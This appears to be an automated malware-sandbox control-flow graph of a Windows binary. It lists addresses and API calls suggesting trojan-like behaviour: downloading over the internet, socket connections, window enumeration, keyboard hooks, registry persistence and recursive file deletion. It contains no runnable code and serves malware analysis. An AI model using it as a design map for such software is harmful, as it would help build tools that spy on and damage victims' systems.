?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 15981->15983 15983->16021 15984 40180c 4 API calls 15984->16021 15985 40180c 4 API calls 15986 40ca85 
16689 4086a5 16687->16689 16690 408665 16688->16690 16691 4086bc ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegDeleteKeyA SetFileAttributesW 16689->16691 16692 4086ac GetModuleFileNameW 16689->16692 16690->16685 16693 4086e9 16691->16693 16694 4086ec ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 16691->16694 16692->16691 16693->16694 16695 408712 7 API calls 16694->16695 16696 408703 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW 16694->16696 16697 4087d7 7 API calls 16695->16697 16698 40877a 7 API calls 16695->16698 16696->16695 16699 408849 ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 16697->16699 16700 40883b ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 16697->16700 16698->16697 16701 408898 15 API calls 16699->16701 16702 40885c ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16699->16702 16700->16699 16965 412d56 16701->16965 16702->16701 16705 408961 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ShellExecuteW 16706 408986 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16705->16706 16707 40897f exit 16705->16707 16706->16626 16707->16706 16708->16573 16710 412d56 4 API calls 16709->16710 16711 412e70 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16710->16711 16711->16635 16712->16565 16713->16608 16714->16505 16716 406e20 16715->16716 16980 406e38 16716->16980 16718 406e26 
16718->16656 16985 413ed0 16719->16985 16721 412560 InternetOpenA InternetOpenUrlA 16722 4125a2 16721->16722 16723 412649 InternetCloseHandle InternetCloseHandle 16721->16723 16724 4125a9 InternetReadFile 16722->16724 16725 4125cb ??2@YAPAXI ??3@YAXPAX 16722->16725 16726 412622 ??2@YAPAXI 16722->16726 16723->16543 16724->16722 16724->16725 16725->16724 16726->16723 16728 402038 2 API calls 16727->16728 16729 407b2b 16728->16729 16987 40209b connect 16729->16987 16731 407b40 16732 407b49 16731->16732 16733 407b5f 16731->16733 16988 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 16732->16988 16989 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 16733->16989 16736 407b59 16737 4020c2 23 API calls 16736->16737 16738 407b7a 16737->16738 16739 402149 691 API calls 16738->16739 16740 407b88 16739->16740 16740->16533 16742 402038 2 API calls 16741->16742 16743 40ef6c 16742->16743 16990 40209b connect 16743->16990 16745 40ef81 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16746 4020c2 23 API calls 16745->16746 16747 40ef99 16746->16747 16748 402149 689 API calls 16747->16748 16749 40efa7 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16748->16749 16749->16533 16751 402038 2 API calls 16750->16751 16752 40c770 16751->16752 16991 40209b connect 16752->16991 16754 40c785 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16755 4020c2 23 API calls 16754->16755 16756 40c79d 16755->16756 16757 402149 689 API calls 16756->16757 16758 40c7ab ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16757->16758 16758->16533 
16759->16511 16761 40ec77 16760->16761 16992 40ec84 16761->16992 16763 40e332 16763->16560 16764->16627 16765->16648 16767 404bd4 _CxxThrowException ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 16766->16767 16768 4047cf ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 16766->16768 16769 404ea7 6 API calls 16767->16769 16770 402440 21 API calls 16768->16770 16772 404bf1 FindClose ExitThread 16769->16772 16771 404804 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16770->16771 16773 404840 ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16771->16773 16774 404825 _CxxThrowException 16771->16774 17006 40504f 16773->17006 16774->16773 16777 4048ed FindNextFileW 16780 404b32 FindClose ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 16777->16780 16781 404905 16777->16781 16778 4048af ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16779 402440 21 API calls 16778->16779 16782 4048cf _CxxThrowException 16779->16782 16785 402440 21 API calls 16780->16785 16783 404912 wcscmp 16781->16783 16784 4049f6 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16781->16784 16788 404a42 ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I 16781->16788 16782->16777 16783->16784 16786 404930 wcscmp 16783->16786 16784->16781 16787 404b6f 
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 16785->16787 16786->16784 16789 404948 7 API calls 16786->16789 16790 404ea7 6 API calls 16787->16790 16791 404b21 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16788->16791 16792 404a65 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16788->16792 17008 404c0a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16789->17008 16794 404b94 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16790->16794 16791->16777 17030 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 16792->17030 16794->16656 16797 404ab6 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 16800 402440 21 API calls 16797->16800 16798 4049ea ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16798->16784 16799 4049cf _CxxThrowException 16799->16798 16801 404ad9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16800->16801 16801->16791 16802 404b06 _CxxThrowException 16801->16802 16802->16791 16804 402038 2 API calls 16803->16804 16805 403bfe 16804->16805 17032 40209b connect 16805->17032 16807 403c13 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16808 4020c2 23 API calls 16807->16808 16809 403c2e 16808->16809 16810 402149 689 API calls 16809->16810 16811 403c3c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16810->16811 16811->16533 16813 404ec7 16812->16813 16814 404f27 16813->16814 16816 404f85 3 API calls 16813->16816 17033 404f85 16813->17033 16814->16656 16817 404ee9 closesocket 16816->16817 16818 404f85 3 API calls 16817->16818 16819 404efd TerminateThread 16818->16819 16819->16813 16820->16553 16822 413413 16821->16822 16823 413526 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16821->16823 16824 4134e5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16822->16824 16825 41341a 16822->16825 16826 40b708 7 API calls 16823->16826 16830 40b708 7 API calls 16824->16830 16827 413421 16825->16827 16828 4134aa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16825->16828 16829 413457 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16826->16829 16831 413424 16827->16831 16832 41346f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16827->16832 16834 40b708 7 API calls 16828->16834 16837 40b708 7 API calls 16829->16837 16830->16829 16835 413577 SystemParametersInfoW 16831->16835 16836 41342b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16831->16836 16838 40b708 7 API calls 16832->16838 16834->16829 16835->16464 16839 40b708 7 API calls 16836->16839 16840 413574 16837->16840 16838->16829 16839->16829 
16840->16835 16841->16530 16843 40ebc7 EnumWindows ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16842->16843 16844 40ec0e 16842->16844 16845 4020c2 23 API calls 16843->16845 17038 40ea96 GetWindowTextW IsWindowVisible sprintf ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 16843->17038 16844->16533 16846 40ebf7 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 16845->16846 16846->16844 16848 402038 2 API calls 16847->16848 16849 41053a 16848->16849 17045 40209b connect 16849->17045 16851 41054f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16852 4020c2 23 API calls 16851->16852 16853 41056a 16852->16853 16854 402149 689 API calls 16853->16854 16855 410578 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16854->16855 16855->16533 16857 402038 2 API calls 16856->16857 16858 4019f3 16857->16858 17046 40209b connect 16858->17046 16860 401a08 16861 401a11 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16860->16861 16862 401a27 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16860->16862 16863 401a3b 16861->16863 16862->16863 16864 4020c2 23 API calls 16863->16864 16865 401a42 16864->16865 16866 402149 688 API calls 16865->16866 16867 401a50 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16866->16867 16867->16533 16869 40e91a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16868->16869 16870 40e80f 16868->16870 16869->16533 17047 402010 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 16870->17047 16874 40e83c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16875 4020c2 23 API calls 16874->16875 16876 40e85b 16875->16876 17052 41228f GlobalMemoryStatusEx 16876->17052 17053 41230a GetModuleHandleA GetProcAddress 16876->17053 16879 40e86f 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 16880 4020c2 23 API calls 16879->16880 16881 40e8d9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16880->16881 16881->16876 16882 40e908 16881->16882 17056 402103 closesocket ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16882->17056 16885 40e9b0 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16884->16885 17057 412ddf CreateFileW 16885->17057 16888 40e9e3 ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16890 40ea74 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16888->16890 16891 40e9f4 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ DeleteFileW 16888->16891 16889 40e9db 16889->16885 16889->16888 16890->16533 16892 402010 3 API calls 16891->16892 16893 40ea10 16892->16893 17062 40209b connect 16893->17062 16895 40ea26 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 16896 4020c2 23 API calls 16895->16896 16897 40ea5b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16896->16897 17063 4020f4 closesocket 16897->17063 16899 40ea6c 17064 402103 closesocket 
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16899->17064 16902 411be4 16901->16902 16910 411be0 16901->16910 16903 402038 2 API calls 16902->16903 16904 411bf0 16903->16904 17065 40209b connect 16904->17065 16906 411c05 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16907 4020c2 23 API calls 16906->16907 16908 411c25 16907->16908 16909 402149 690 API calls 16908->16909 16909->16910 16910->16533 16912 411b70 16911->16912 16913 411b77 16911->16913 16914 411a24 106 API calls 16912->16914 16913->16533 16915 411b75 16914->16915 16915->16533 16917 41358b 48 API calls 16916->16917 16918 411a3b ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ PathFileExistsW 16917->16918 16919 411a56 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 16918->16919 16920 411ad9 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16918->16920 16922 411abb ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16919->16922 16923 411a6d 16919->16923 17066 411af5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16920->17066 16926 412e4e 7 API calls 16922->16926 16924 411a76 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16923->16924 16925 411a9b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16923->16925 16929 411a94 16924->16929 16925->16929 16927 411ad6 16926->16927 16927->16920 16930 4020c2 23 API calls 16929->16930 16931 411a99 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16930->16931 16931->16656 16933 411b9a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16932->16933 16934 411bbf 16932->16934 
16935 4020c2 23 API calls 16933->16935 16934->16533 16936 411bbd 16935->16936 16936->16533 16937->16555 16938->16671 16940 406d71 16939->16940 16941 406d5e UnhookWindowsHookEx TerminateThread 16939->16941 16974 406cff ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ DeleteFileW ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 16940->16974 16941->16940 16945 412bee 18 API calls 16944->16945 16946 410520 16945->16946 16946->16674 16948 412d44 16947->16948 16949 412c5d wcscpy 16947->16949 16948->16680 16950 412c79 FindNextFileW 16949->16950 16951 412c91 16950->16951 16952 412d1d GetLastError 16950->16952 16951->16950 16953 412d49 FindClose 16951->16953 16955 412d36 FindClose RemoveDirectoryW 16951->16955 16956 412ca6 wcscat 16951->16956 16957 412cf8 SetFileAttributesW 16951->16957 16958 412d0a DeleteFileW 16951->16958 16959 412bee 2 API calls 16951->16959 16960 412cdb wcscpy 16951->16960 16961 412cd2 RemoveDirectoryW 16951->16961 16977 412bba wcscmp 16951->16977 16952->16951 16952->16953 16953->16948 16955->16948 16956->16951 16957->16958 16958->16951 16958->16953 16959->16951 16960->16951 16961->16960 16963 40ba03 16962->16963 16964 40ba07 RegDeleteValueW 16962->16964 16963->16679 16964->16679 16966 412d66 CreateFileW 16965->16966 16968 40895a 16966->16968 16969 412da4 16966->16969 16968->16705 16968->16706 16970 412dba WriteFile 16969->16970 16971 412daa SetFilePointer 16969->16971 16972 412dd2 CloseHandle 16970->16972 16973 412dd0 16970->16973 16971->16970 16971->16972 16972->16968 16973->16972 16975 406d3c 16974->16975 16976 406d2d ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ RemoveDirectoryW 16974->16976 16975->16672 16976->16975 16978 412bd4 wcscmp 16977->16978 16979 412be4 16977->16979 16978->16979 16979->16951 16982 406e58 16980->16982 16983 406efb 16980->16983 16981 406e83 LoadLibraryA 16981->16982 16981->16983 16982->16981 16982->16983 16984 406ecd GetProcAddress 16982->16984 16983->16718 
16984->16982 16984->16983 16986 413edc 16985->16986 16986->16721 16986->16986 16987->16731 16988->16736 16989->16736 16990->16745 16991->16754 16993 40ec90 16992->16993 16996 40ecc1 16993->16996 16995 40ecae 16995->16763 16997 40ece3 16996->16997 17001 40ed70 16996->17001 17002 40ee81 16997->17002 16999 40ed13 17005 4018db ??3@YAXPAX 16999->17005 17001->16995 17003 40eef1 ??2@YAPAXI 17002->17003 17004 40ee8e 17003->17004 17004->16999 17005->17001 17007 404869 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ FindFirstFileW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17006->17007 17007->16777 17007->16778 17009 40504f 17008->17009 17010 404c4f ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ FindFirstFileW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17009->17010 17011 404e83 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17010->17011 17012 404c93 FindNextFileW 17010->17012 17015 4049cb 17011->17015 17013 404e7a FindClose 17012->17013 17014 404cab 17012->17014 17013->17011 17016 404d64 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 17014->17016 17017 404cb8 wcscmp 17014->17017 17020 404d9c ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I 17014->17020 17015->16798 17015->16799 17016->17014 17017->17016 17018 404cd6 wcscmp 17017->17018 17018->17016 17019 404cea 7 API calls 17018->17019 17021 404c0a 24 
API calls 17019->17021 17022 404e44 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17020->17022 17023 404dbc ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 17020->17023 17024 404d5b ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17021->17024 17022->17012 17031 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 17023->17031 17024->17016 17026 404e05 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 17027 402440 21 API calls 17026->17027 17028 404e25 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 17027->17028 17028->17022 17029 404e52 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17028->17029 17029->17015 17030->16797 17031->17026 17032->16807 17034 404f91 17033->17034 17035 404f9f 17034->17035 17037 40500c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@ _CxxThrowException 17034->17037 17035->16813 17043 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 17038->17043 17040 40eafe 17044 412718 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 17040->17044 17042 40eb19 14 API calls 17043->17040 17044->17042 17045->16851 17046->16860 17048 402031 17047->17048 17049 40202a 17047->17049 17051 40209b connect 17048->17051 17050 402038 2 API calls 17049->17050 17050->17048 17051->16874 17052->16876 17054 41233a Sleep 17053->17054 17055 412353 __aulldiv 17054->17055 17055->16879 17056->16869 17058 40e9c3 Sleep ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 17057->17058 17059 412e0a GetFileSize ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ReadFile 17057->17059 17058->16888 17058->16889 17060 412e41 CloseHandle 17059->17060 17061 412e3f 17059->17061 17060->17058 17061->17060 17062->16895 17063->16899 17064->16890 17065->16906 17067 41203b 13 API calls 17066->17067 17068 411b27 GetModuleHandleA PlaySoundW Sleep PlaySoundW 17067->17068 17068->16931 17070 405e82 17069->17070 17071 405e78 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 17069->17071 17072 405e88 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD SetEvent 17070->17072 17073 405e9b free ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 17070->17073 17071->17070 17072->17073 17073->16361 17075 40b840 RegSetValueExA RegCloseKey 17074->17075 17076 40b86a 17074->17076 17075->16048 17076->16048 17078 407daa 17077->17078 17079 407d6c ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 17077->17079 17081 407db0 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ 
??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 17078->17081 17082 407dee 17078->17082 17090 40b7b9 RegCreateKeyW 17079->17090 17084 40b7b9 7 API calls 17081->17084 17085 407e32 17082->17085 17086 407df4 ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG 17082->17086 17083 407d9e ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17083->17078 17087 407de2 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17084->17087 17085->16059 17088 40b7b9 7 API calls 17086->17088 17087->17082 17089 407e26 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17088->17089 17089->17085 17091 40b7d0 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ RegSetValueExW RegCloseKey 17090->17091 17092 40b81c ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17090->17092 17093 40b80b 17091->17093 17094 40b80d ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17091->17094 17092->17083 17093->17094 17094->17083 17096 40b522 4 API calls 17095->17096 17097 4032d4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 17096->17097 17097->16083 17099 4127d7 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 17098->17099 17099->15770 17101 412b6a 17100->17101 17102 412b6f GetModuleFileNameExW 17100->17102 17105 412bab ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 17101->17105 17103 412b89 CloseHandle 17102->17103 17104 412b9a CloseHandle 17102->17104 17103->17101 17104->17105 17105->16159 17107 412b21 OpenProcess 17106->17107 17108 409b9f 17106->17108 17107->17108 

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
